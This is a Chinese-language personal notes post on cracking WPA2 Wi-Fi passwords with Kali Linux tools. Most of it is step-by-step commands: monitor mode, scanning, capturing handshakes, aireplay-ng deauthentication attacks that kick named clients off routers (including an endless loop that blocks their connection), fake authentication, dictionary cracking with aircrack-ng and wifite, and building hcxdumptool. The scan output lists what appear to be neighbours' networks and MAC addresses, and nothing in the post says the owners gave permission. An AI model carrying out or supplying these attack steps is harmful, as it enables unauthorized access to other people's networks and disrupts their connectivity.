简书链接:无线渗透之kali笔记
文章字数:1542,阅读全文大约需要6分钟

1
2
D4:EE:07:59:CE:70  -33        5        1    0   8  130   WPA2 CCMP   PSK  CMCC-1024                                                                     
EC:41:18:28:03:40 -66 5 0 0 6 130 WPA2 CCMP PSK Xiaomi_033F

当前网卡
Current MAC: 1c:bf:ce:b6:42:06 (unknown)
Permanent MAC: 1c:bf:ce:b6:42:06 (unknown)

  • 抓握手包
    airodump-ng -c 4 –bssid EC:41:18:28:03:40 -w hach wlan0mon

开启监听模式
airmon-ng start wlan0
查看wifi网卡信息
iwconfig
嗅探wifi

airodump-ng wlan0mon

攻击
aireplay-ng -0 1 –a EC:41:18:28:03:40 -c 08:ED:B9:89:FB:B1 wlan0mon

  • -0 Deautenticate 冲突模式
    使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARP request。
    如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
    aireplay-ng -0 10 –a -c wifi0 参数说明:
    【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
    【-a】:设置 ap 的 mac
    【-c】:设置已连接的合法客户端的 mac。
    如果不设置-c,则断开所有和 ap 连接的合法客户端。
    aireplay-ng -3 -b -h wifi0
    aireplay-ng -3 -b EC:41:18:28:03:40 -h EC:41:18:28:03:40 wifi0

冲突模式

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0

注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器

  • fake count

aireplay-ng --fakeauth 0 -a EC:41:18:28:03:40 -c 1c:bf:ce:b6:42:06 wlan0mon

查看wifi设备?不可用
airmon-ng show wlan device

开始嗅探
airmon-ng start wlan0网卡将从 wlan0 ->wlan0mon```

扫描wifi
airodump-ng wlan0mon

抓取握手包 handshake package

iairodump-ng -c 4 --bssid EC:41:18:28:03:40 -w hackdir wlan0mon
跑包tcpdump .cap后缀包

aircrack-ng -2 -b mac_address dic.txt resouce.cap
踢用户

1
aireplya-ng -0 10 -a EC:41:18:28:03:40 -c target-wifi-mac-user wlan0mon

比如
aireplay-ng -0 10 -a EC:41:18:28:03:40 -c A2:4E:03:10:C7:73 wlan0mon
-c是用户的手机mac地址,-a是路由器的mac也就是bssid地址

1
2
3
D4:EE:07:59:CE:70  -39       35       26    0   8  130   WPA2 CCMP   PSK  CMCC-1024                                                                 
EC:41:18:28:03:40 -63 19 0 0 6 130 WPA2 CCMP PSK Xiaomi_033F 
6C:38:45:7D:33:BD -68 4 0 0 6 130 WPA2 CCMP PSK ChinaNet-vteT
  • 使用wifite
    enter wifite scan wifi and client?
    wifite ctrl+c choose number crack, all crack all
    wifite默认字典
    vim /usr/share/dict/wordlist-probable.txt

冲突问题解决
在虚拟机重新选择网卡, 或者重启kili或者执行

network-manager stop```,以及
1
2
3
4
5
6
7
8
9
10
```airmon-ng check kill```

**安装hcxdumptool**

下载源码编译(使用root运行,Linux内核版本>=4.14) https://github.com/ZerBea/hcxdumptool/archive/4.2.0.tar.gz tarf -xvf 4.2.0.tar.gz cd hcxdumptool-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下
**hcxtools**
安装依赖软件包,解决编译报错 apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev #下载源码编译(使用root运行) wget https://github.com/ZerBea/hcxtools/archive/4.2.0.tar.gz tar -xvf 4.2.0.tar.gz cd hcxtools-4.2.0 make && make install # 编译完成后的工具均安装在/usr/local/bin/目录下。
除了使用下载方法进行编译外还可以使用进行修改 源编译.

首先复制下面文本

#清华大学源
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙江大学源
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#官方源
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib
————————————————

1
2
3
4
5
6
7
8
9
10
11
12
13
14
输入命令
```gedit```到或者```vim /etc/apt/sources.list```
参考链接:https://blog.csdn.net/xsgjm/article/details/105847524

wifi crack hcxdumptool下载地址
https://github.com/ZerBea/hcxdumptool


跑字典
```aircrack-ng -w /1.txt /root/use/cap.cap```

攻击wifi设备的标准步骤
Step 1:

airodump-ng -c -bssid -w
irodump-ng -c 6 -bssid EC:41:18:28:03:40 -w Xiaomi_033F wlan0mon

1
2
3
4
5
6
输入后你讲看到这2个列,Station列代表的是mac地址,没有的话,要么抓不到,要么是每用户连接
Station: Frames ,



Step 2:

aireply-ng -0 10 -a AP_BSSID -C STATION_MAC_ADDRESS
10 is attach count, APP_BSSID IS WIFI_MAC_ADDRESS




STATION_MAC_ADDRESS IS YOU PHONE OR OTHER CLIENT MAC ADDRESSS

kali系统更新
```apt-get upgrade```             upgrade all soft
```apt-get update update``` version info
```apt-get dist-upgrade```        update all system
跑包其它方法
EWSA 5.1.271破包工具 WIFIPR 中文汉化免安装
![image.png](https://upload-images.jianshu.io/upload_images/2815884-25f2e812d34f61e0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
字典生成的不说了,kali有命令..
linux好久没玩了
```sudo su``` 切换超级用户 需要输入系统密码.
```passwd``` 在su模式下可以修改密码
以后执行```su```输入密码就行了
kali安装的时候有一个设备路径必须选择,否则开启启动就黑屏.

关于虚拟机问题也有很多,15蓝屏,修复蓝屏又导致另外一个问题,反正就是一个死循环了,后面升级15搞定了.


最后关于密码穷举的问题普及一下,一种就是一个一个的连接尝试,这样非常慢,2秒尝试一个密码,
这个window用python脚本就行
还有一种就是抓用户握手包,踢下线就能抓了,但是不是什么路由器都能查看到设备,或者能踢下线的.
抓到了加密包,就需要穷举了,速度比那个还要好一点

下图可以看出来基本上看不到设备数..
![image.png](https://upload-images.jianshu.io/upload_images/2815884-39f3cf94809b828a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

抓包和基本字典测试.
![xxx.png](https://upload-images.jianshu.io/upload_images/2815884-9b0ecacf7c758bbd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)